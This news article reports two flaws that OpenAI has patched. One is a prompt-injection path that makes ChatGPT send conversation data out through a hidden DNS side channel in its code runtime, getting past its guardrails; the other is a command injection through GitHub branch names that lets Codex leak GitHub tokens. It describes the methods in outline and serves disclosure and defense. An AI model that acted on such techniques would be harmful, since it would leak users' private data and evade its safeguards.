• Menu
  • Skip to main content
  • Skip to primary sidebar

The Cyber Security News

Latest Cyber Security News

Header Right

  • Latest News
  • Vulnerabilities
  • Cloud Services
Cyber Security News

OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability

You are here: Home / General Cyber Security News / OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability
March 30, 2026

A previously unknown vulnerability in OpenAI ChatGPT allowed sensitive conversation data to be exfiltrated without user knowledge or consent, according to new findings from Check Point.

“A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content,” the cybersecurity company said in a report published today. “A backdoored GPT could abuse the same weakness to obtain access to user data without the user’s awareness or consent.”

✔ Approved From Our Partners
AOMEI Backupper Lifetime

Protect and backup your data using AOMEI Backupper. AOMEI Backupper takes secure and encrypted backups from your Windows, hard drives or partitions. With AOMEI Backupper you will never be worried about loosing your data anymore.

Get AOMEI Backupper with 72% discount from an authorized distrinutor of AOMEI: SerialCart® (Limited Offer).

➤ Activate Your Coupon Code


Following responsible disclosure, OpenAI addressed the issue on February 20, 2026. There is no evidence that the issue was ever exploited in a malicious context.

While ChatGPT is built with various guardrails to prevent unauthorized data sharing or generate direct outbound network requests, the newly discovered vulnerability bypasses these safeguards entirely by exploiting a side channel originating from the Linux runtime used by the artificial intelligence (AI) agent for code execution and data analysis.

Specifically, it abuses a hidden DNS-based communication path as a “covert transport mechanism” by encoding information into DNS requests to get around visible AI guardrails. What’s more, the same hidden communication path could be used to establish remote shell access inside the Linux runtime and achieve command execution.

In the absence of any warning or user approval dialog, the vulnerability creates a security blind spot, with the AI system assuming that the environment was isolated.

As an illustrative example, an attacker could convince a user to paste a malicious prompt by passing it off as a way to unlock premium capabilities for free or improve ChatGPT’s performance. The threat gets magnified when the technique is embedded inside custom GPTs, as the malicious logic could be baked into it as opposed to tricking a user into pasting a specially crafted prompt.

Cybersecurity

“Crucially, because the model operated under the assumption that this environment could not send data outward directly, it did not recognize that behavior as an external data transfer requiring resistance or user mediation,” Check Point explained. “As a result, the leakage did not trigger warnings about data leaving the conversation, did not require explicit user confirmation, and remained largely invisible from the user’s perspective.”

With tools like ChatGPT increasingly embedded in enterprise environments and users uploading highly personal information, vulnerabilities like these underscore the need for organizations to implement their own security layer to counter prompt injections and other unexpected behavior in AI systems.

“This research reinforces a hard truth for the AI era: don’t assume AI tools are secure by default,” Eli Smadja, head of research at Check Point Research, said in a statement shared with The Hacker News.

“As AI platforms evolve into full computing environments handling our most sensitive data, native security controls are no longer sufficient on their own. Organizations need independent visibility and layered protection between themselves and AI vendors. That’s how we move forward safely — by rethinking security architecture for AI, not reacting to the next incident.”

The development comes as threat actors have been observed publishing web browser extensions (or updating existing ones) that engage in the dubious practice of prompt poaching to silently siphon AI chatbot conversations without user consent, highlighting how seemingly harmless add-ons could become a channel for data exfiltration.

“It almost goes without saying that these plugins open the doors to several risks, including identity theft, targeted phishing campaigns, and sensitive data being put up for sale on underground forums,” Expel researcher Ben Nahorney said. “In the case of organizations where employees may have unwittingly installed these extensions, they may have exposed intellectual property, customer data, or other confidential information.”

Command Injection Vulnerability in OpenAI Codex Leads to GitHub Token Compromise

The findings also coincide with the discovery of a critical command injection vulnerability in OpenAI’s Codex, a cloud-based software engineering agent, that could have been exploited to steal GitHub credential data and ultimately compromise multiple users interacting with a shared repository.

“The vulnerability exists within the task creation HTTP request, which allows an attacker to smuggle arbitrary commands through the GitHub branch name parameter,” BeyondTrust Phantom Labs researcher Tyler Jespersen said in a report shared with The Hacker News. “This can result in the theft of a victim’s GitHub User Access Token – the same token Codex uses to authenticate with GitHub.”

The issue, per BeyondTrust, stems from improper input sanitization when processing GitHub branch names during task execution on the cloud. Because of this inadequacy, an attacker could inject arbitrary commands through the branch name parameter in an HTTPS POST request to the backend Codex API, execute malicious payloads inside the agent’s container, and retrieve sensitive authentication tokens.

Cybersecurity

“This granted lateral movement and read/write access to a victim’s entire codebase,” Kinnaird McQuade, chief security architect at BeyondTrust, said in a post on X. It has been patched by OpenAI as of February 5, 2026, after it was reported on December 16, 2025. The vulnerability affects the ChatGPT website, Codex CLI, Codex SDK, and the Codex IDE Extension.

The cybersecurity vendor said the branch command injection technique could also be extended to steal GitHub Installation Access tokens and execute bash commands on the code review container whenever @codex is referenced in GitHub. 

“With the malicious branch set up, we referenced Codex in a comment on a pull request (PR),” it explained. “Codex then initiated a code review container and created a task against our repository and branch, executing our payload and forwarding the response to our external server.”

The research also highlights a growing risk where the privileged access granted to AI coding agents can be weaponized to provide a “scalable attack path” into enterprise systems without triggering traditional security controls.

“As AI agents become more deeply integrated into developer workflows, the security of the containers they run in – and the input they consume – must be treated with the same rigor as any other application security boundary,” BeyondTrust said. “The attack surface is expanding, and the security of these environments needs to keep pace.”

Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.


Some parts of this article are sourced from:
thehackernews.com

Previous Post: «deepload malware uses clickfix and wmi persistence to steal browser DeepLoad Malware Uses ClickFix and WMI Persistence to Steal Browser Credentials

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Report This Article

Recent Posts

  • OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability
  • DeepLoad Malware Uses ClickFix and WMI Persistence to Steal Browser Credentials
  • ⚡ Weekly Recap: Telecom Sleeper Cells, LLM Jailbreaks, Apple Forces U.K. Age Checks and More
  • 3 SOC Process Fixes That Unlock Tier 1 Productivity
  • The State of Secrets Sprawl 2026: 9 Takeaways for CISOs
  • Russian CTRL Toolkit Delivered via Malicious LNK Files Hijacks RDP via FRP Tunnels
  • Three China-Linked Clusters Target Southeast Asian Government in 2025 Cyber Campaign
  • Iran-Linked Hackers Breach FBI Director’s Personal Email, Hit Stryker With Wiper Attack
  • Citrix NetScaler Under Active Recon for CVE-2026-3055 (CVSS 9.3) Memory Overread Bug Mar 28, 2026 Vulnerability / Network Security A recently disclosed critical security flaw impacting Citrix NetScaler ADC and NetScaler Gateway is witnessing active reconnaissance activity, according to Defused Cyber and watchTowr . The vulnerability, CVE-2026-3055 (CVSS score: 9.3), refers to a case of insufficient input validation leading to memory overread, which an attacker could exploit to leak potentially sensitive information. Per Citrix, successful exploitation of the flaw hinges on the appliance being configured as a SAML Identity Provider (SAML IDP). "We are now observing auth method fingerprinting activity against NetScaler ADC/Gateway in the wild," Defused Cyber said in a post on X. "Attackers are probing /cgi/GetAuthMethods to enumerate enabled authentication flows in our Citrix honeypots." This is likely an attempt on the part of threat actors to determine if NetScaler ADC and NetScaler Gateway are indeed configured as a SAML IDP. In a similar warning, watchTowr said it has detected active…
  • CISA Adds CVE-2025-53521 to KEV After Active F5 BIG-IP APM Exploitation

Copyright © TheCyberSecurity.News, All Rights Reserved.